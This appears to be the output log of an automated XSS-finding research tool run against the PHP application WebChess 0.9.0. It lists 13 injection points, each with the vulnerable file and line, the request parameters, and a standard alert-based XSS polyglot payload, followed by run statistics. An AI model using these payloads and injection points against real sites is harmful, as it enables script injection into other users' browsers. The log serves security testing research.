//START ATTACKS FOUND
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:215 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chess.php
Input:
ToDo="NewUser"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
fromCol="1"
fromRow="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
isCheckMate="1"
isInCheck="1"
promotion="1"
pwdPassword="1"
rdoHistory="1"
rdoTheme="1"
requestDraw="1"
requestUndo="1"
resign="1"
toCol="1"
toRow="1"
txtEmailNotification="1"
txtFirstName="1"
txtLastName="1"
txtNick="1"
txtReload="1"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631192914/mainmenu.php14929589091.xml
alert(String.fromCharCode(88,83,83))
">'>
=">
alert(String.fromCharCode(88,83,83))
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:216 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chess.php
Input:
ToDo="NewUser"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
fromCol="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
fromRow="1"
isCheckMate="1"
isInCheck="1"
promotion="1"
pwdPassword="1"
rdoHistory="1"
rdoTheme="1"
requestDraw="1"
requestUndo="1"
resign="1"
toCol="1"
toRow="1"
txtEmailNotification="1"
txtFirstName="1"
txtLastName="1"
txtNick="1"
txtReload="1"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631194102/mainmenu.php-20325226911.xml
alert(String.fromCharCode(88,83,83))
">'>
=">
alert(String.fromCharCode(88,83,83))
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:217 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chess.php
Input:
ToDo="NewUser"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
fromCol="1"
fromRow="1"
isCheckMate="1"
isInCheck="1"
promotion="1"
pwdPassword="1"
rdoHistory="1"
rdoTheme="1"
requestDraw="1"
requestUndo="1"
resign="1"
toCol="1"
toRow="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
txtEmailNotification="1"
txtFirstName="1"
txtLastName="1"
txtNick="1"
txtReload="1"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631194684/mainmenu.php-19045960991.xml
alert(String.fromCharCode(88,83,83))
">'>
=">
alert(String.fromCharCode(88,83,83))
/*transferboarddatatojavacripts*/varDEBUG=0;varCURRENTTHEME='1';varPAWN=1;varKNIGHT=2;varBISHOP=4;varROOK=8;varQUEEN=16;varKING=32;varBLACK=128;varWHITE=0;varCOLOR_MASK=127;varboard=newArray();board[0]=newArray();board[0][0]=0;board[0][1]=0;board[0][2]=0;board[0][3]=0;board[0][4]=0;board[0][5]=0;board[0][6]=0;board[0][7]=0;board[1]=newArray();board[1][0]=0;board[1][1]=0;board[1][2]=0;board[1][3]=0;board[1][4]=0;board[1][5]=0;board[1][6]=0;board[1][7]=0;board[2]=newArray();board[2][0]=0;board[2][1]=0;board[2][2]=0;board[2][3]=0;board[2][4]=0;board[2][5]=0;board[2][6]=0;board[2][7]=0;board[3]=newArray();board[3][0]=0;board[3][1]=0;board[3][2]=0;board[3][3]=0;board[3][4]=0;board[3][5]=0;board[3][6]=0;board[3][7]=0;board[4]=newArray();board[4][0]=0;board[4][1]=0;board[4][2]=0;board[4][3]=0;board[4][4]=0;board[4][5]=0;board[4][6]=0;board[4][7]=0;board[5]=newArray();board[5][0]=0;board[5][1]=0;board[5][2]=0;board[5][3]=0;board[5][4]=0;board[5][5]=0;board[5][6]=0;board[5][7]=0;board[6]=newArray();board[6][0]=0;board[6][1]=0;board[6][2]=0;board[6][3]=0;board[6][4]=0;board[6][5]=0;board[6][6]=0;board[6][7]=0;board[7]=newArray();board[7][0]=0;board[7][1]=0;board[7][2]=0;board[7][3]=0;board[7][4]=0;board[7][5]=0;board[7][6]=0;board[7][7]=0;varnumMoves=-1;varerrMsg='';varCURPIECE=0;varCURCOLOR=1;varFROMROW=2;varFROMCOL=3;varTOROW=4;varTOCOL=5;varchessHistory=newArray();if(DEBUG)alert("Gameinitilizationcomplete!");
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:218 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/chess.php
Input:
ToDo="NewUser"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=1
fromCol="1"
fromRow="1"
isCheckMate="1"
isInCheck="1"
promotion="1"
pwdPassword="1"
rdoHistory="1"
rdoTheme="1"
requestDraw="1"
requestUndo="1"
resign="1"
toCol="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
toRow="1"
txtEmailNotification="1"
txtFirstName="1"
txtLastName="1"
txtNick="1"
txtReload="1"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631195268/mainmenu.php-13298558111.xml
alert(String.fromCharCode(88,83,83))
">'>
=">
alert(String.fromCharCode(88,83,83))
/*transferboarddatatojavacripts*/varDEBUG=0;varCURRENTTHEME='1';varPAWN=1;varKNIGHT=2;varBISHOP=4;varROOK=8;varQUEEN=16;varKING=32;varBLACK=128;varWHITE=0;varCOLOR_MASK=127;varboard=newArray();board[0]=newArray();board[0][0]=0;board[0][1]=0;board[0][2]=0;board[0][3]=0;board[0][4]=0;board[0][5]=0;board[0][6]=0;board[0][7]=0;board[1]=newArray();board[1][0]=0;board[1][1]=0;board[1][2]=0;board[1][3]=0;board[1][4]=0;board[1][5]=0;board[1][6]=0;board[1][7]=0;board[2]=newArray();board[2][0]=0;board[2][1]=0;board[2][2]=0;board[2][3]=0;board[2][4]=0;board[2][5]=0;board[2][6]=0;board[2][7]=0;board[3]=newArray();board[3][0]=0;board[3][1]=0;board[3][2]=0;board[3][3]=0;board[3][4]=0;board[3][5]=0;board[3][6]=0;board[3][7]=0;board[4]=newArray();board[4][0]=0;board[4][1]=0;board[4][2]=0;board[4][3]=0;board[4][4]=0;board[4][5]=0;board[4][6]=0;board[4][7]=0;board[5]=newArray();board[5][0]=0;board[5][1]=0;board[5][2]=0;board[5][3]=0;board[5][4]=0;board[5][5]=0;board[5][6]=0;board[5][7]=0;board[6]=newArray();board[6][0]=0;board[6][1]=0;board[6][2]=0;board[6][3]=0;board[6][4]=0;board[6][5]=0;board[6][6]=0;board[6][7]=0;board[7]=newArray();board[7][0]=0;board[7][1]=0;board[7][2]=0;board[7][3]=0;board[7][4]=0;board[7][5]=0;board[7][6]=0;board[7][7]=0;varnumMoves=-1;varerrMsg='';varCURPIECE=0;varCURCOLOR=1;varFROMROW=2;varFROMCOL=3;varTOROW=4;varTOCOL=5;varchessHistory=newArray();if(DEBUG)alert("Gameinitilizationcomplete!");
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:81 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/opponentspassword.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=2
gameID="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
pwdPassword="VerboseP"
txtNick="VerboseP"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631198318/mainmenu.php5706735831.xml
alert(String.fromCharCode(88,83,83))
alert(String.fromCharCode(88,83,83))
="type="hidden"/>
">'>
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:87 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/opponentspassword.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=2
gameID="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
pwdPassword="VerboseP"
txtNick="VerboseP"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631198636/mainmenu.php5706735831.xml
alert(String.fromCharCode(88,83,83))
alert(String.fromCharCode(88,83,83))
="type="hidden"/>
">'>
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:88 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/opponentspassword.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=2
gameID="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
pwdPassword="VerboseP"
txtNick="VerboseP"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631198965/mainmenu.php5706735831.xml
alert(String.fromCharCode(88,83,83))
alert(String.fromCharCode(88,83,83))
="type="hidden"/>
">'>
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/mainmenu.php
vulnerability at line:89 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/opponentspassword.php
Input:
ToDo="Login"
_CHESSUTILS="1"
_fixOldPHPVersions="1"
btnMainMenu=2
gameID="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
pwdPassword="VerboseP"
txtNick="VerboseP"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631199335/mainmenu.php5706735831.xml
alert(String.fromCharCode(88,83,83))
alert(String.fromCharCode(88,83,83))
="type="hidden"/>
">'>
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/index.php
vulnerability at line:60 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/newuser.php
Input:
_fixOldPHPVersions="1"
btnIndex=2
tmpNewUser="1"
txtEmailNotification="1"
txtFirstName="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
txtLastName="1"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631211943/index.php-8450342081.xml
alert(String.fromCharCode(88,83,83))
">'>
=">
alert(String.fromCharCode(88,83,83))
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/index.php
vulnerability at line:70 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/newuser.php
Input:
_fixOldPHPVersions="1"
btnIndex=2
tmpNewUser="1"
txtEmailNotification="1"
txtFirstName="1"
txtLastName="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631212255/index.php-8963497281.xml
alert(String.fromCharCode(88,83,83))
">'>
=">
alert(String.fromCharCode(88,83,83))
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/index.php
vulnerability at line:149 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/newuser.php
Input:
_fixOldPHPVersions="1"
btnIndex=2
tmpNewUser="1"
txtEmailNotification="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
txtFirstName="1"
txtLastName="1"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631218537/index.php-14774066321.xml
alert(String.fromCharCode(88,83,83))
">'>
=">
alert(String.fromCharCode(88,83,83))
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/index.php
vulnerability at line:45 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/newuser.php
Input:
_fixOldPHPVersions="1"
btnIndex=2
tmpNewUser="1"
txtEmailNotification="1"
txtFirstName="1"
txtLastName="1"
txtNick="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631219366/index.php-4396522871.xml
alert(String.fromCharCode(88,83,83))
--------------------------------
/home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/index.php
vulnerability at line:142 in /home/jars/eclipse-workspace/ardilla/experiments/subjectPrograms/WebChess_0.9.0/newuser.php
Input:
CFG_MINAUTORELOAD="';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>=&{}"
CFG_NEW_USERS_ALLOWED=1
CFG_USEEMAILNOTIFICATION="1"
_CONFIG="1"
_fixOldPHPVersions="1"
btnIndex=2
tmpNewUser="1"
txtFirstName="1"
txtLastName="1"
Possible XSS Injections in /home/jars/eclipse-workspace/ardilla/results/tmp1220631225706/index.php-9504417611.xml
alert(String.fromCharCode(88,83,83))
">'>
=">(min:';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->
=secs)
alert(String.fromCharCode(88,83,83))
//END ATTACKS FOUND
attacks:13
no more inputs to explore
------------------------------------------------
attack count:13
coveredEchos:39
coveredTaintedEchos:13
time:1159319